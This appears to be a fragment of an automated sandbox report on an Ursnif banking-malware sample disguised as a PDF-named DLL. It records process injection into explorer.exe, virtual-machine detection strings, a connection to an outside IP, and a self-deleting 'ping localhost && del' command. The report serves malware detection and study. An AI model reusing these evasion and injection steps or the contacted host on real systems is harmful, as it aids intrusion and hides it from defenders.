                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF68BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\626a97fea05c8.pdf.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{A446E4F3-B3E1-76BB-5D18-970AE1CCBBDE}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1300:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{50416995-6F24-0207-7984-1356BDF8F7EA}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{F059674E-8F24-A2C8-9924-33F6DD98178A}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: 626a97fea05c8.pdf.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 626a97fea05c8.pdf.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000004.00000003.534897078.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.540095400.0000000005D70000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF7EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00EF828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_009038A0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E3495 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00903D9F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EEC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.cmdline
                      Source: vx43imot.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x601a
                      Source: pyir2nwc.dll.20.drStatic PE information: real checksum: 0x0 should be: 0x4f4e
                      Source: 626a97fea05c8.pdf.dllStatic PE information: real checksum: 0x79835 should be: 0xa2cb3
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000004.00000003.424373972.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424240322.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.530255853.0000000005CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475301685.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.571518194.00000182D98EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424606218.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545160730.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.472906954.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.545084241.00000267B3B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424163423.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424658030.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424644302.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424536633.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.476686328.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.424457867.0000000004EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3340, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6636, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5008, type: MEMORYSTR
                      Source: Yara matchFile source: 4.2.rundll32.exe.ef0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.48e94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4dca4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e76b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.4e494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.601015727.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.543939686.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.599055996.00000000048E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.542346452.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.599465657.00000000008E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475223060.0000000004DCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000000.544562349.00000000009F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.475254135.0000000004E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\626a97fea05c8.pdf.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5785
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2355
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pyir2nwc\pyir2nwc.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vx43imot\vx43imot.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EFD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: mshta.exe, 00000011.00000003.496398794.000001B1A0BA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\b
                      Source: explorer.exe, 0000001B.00000000.574335319.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.574335319.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
                      Source: explorer.exe, 0000001B.00000000.587271714.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000020.00000000.813259722.000002BFD4858000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001B.00000000.587271714.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
                      Source: rundll32.exe, 00000004.00000002.600414567.0000000000B43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.600473682.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.484939842.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000001B.00000000.587271714.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 0000001B.00000000.563226300.00000000042EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
                      Source: explorer.exe, 0000001B.00000000.608751295.00000000042A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E99BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008FBAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E65C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EEC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E8FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 94.140.115.8 80
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: AA0000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2890000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 424A1580
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 424A1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: 424A1580
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF772CE12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: AA0000
